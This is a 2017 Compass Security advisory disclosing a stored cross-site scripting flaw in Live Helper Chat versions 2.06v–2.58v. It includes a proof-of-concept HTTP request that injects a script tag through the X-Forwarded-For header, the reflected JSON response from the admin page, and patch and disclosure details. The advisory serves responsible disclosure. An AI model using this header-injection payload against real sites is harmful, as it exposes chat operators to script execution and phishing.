Live Helper Chat - Cross-Site Scripting

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor:  Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Sylvain Heiniger (sylvain.heiniger@compass-security.com)
# Date:    April 24, 2017
#
#############################################################


Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [=
1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code=
 in
the browser of a user. This allows, for instance, attacking the users brow=
ser
or redirecting the user to a phishing website. The attack will be in some c=
ases
automatically run in the backend operators session. Otherwise, one can sen=
d
the victim a link to the website with the malicious payload.


Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-----------------------------
Live Helper Chat detects the visitors IP address. To this end, it reads th=
e
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in thi=
s
header. It will be reflected in the administrators "online users" informat=
ion
page as well as in the "print chat" page.

Users request:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveam=
essage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188

Username=3DExample&Question=3DMy+question&user_timezone=3D2&URLRefer=3D%2F%=
2Flocalhost%2F&r=3D&operator=3D0&StartChat=3D1&captcha_1977271e431742414c31=
477d258028664d713ae0=3D1475518554&tscaptcha=3D1475518554
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Subsequent request to the online users page /lhc_web/index.php/site_admin/c=
hat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded=
 with:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
[{"id":"1","ip":"<script>alert(1);</script>","vid":"47428qicplsqmfe9huq2",=
 [JSON MESSAGE CUT]
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Note: the above JSON response is sent by the application with the content-t=
ype text/html,
making it vulnerable to XSS as is.


Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure


References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f520=
98d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fe=
d613c5e306152ea60255edba2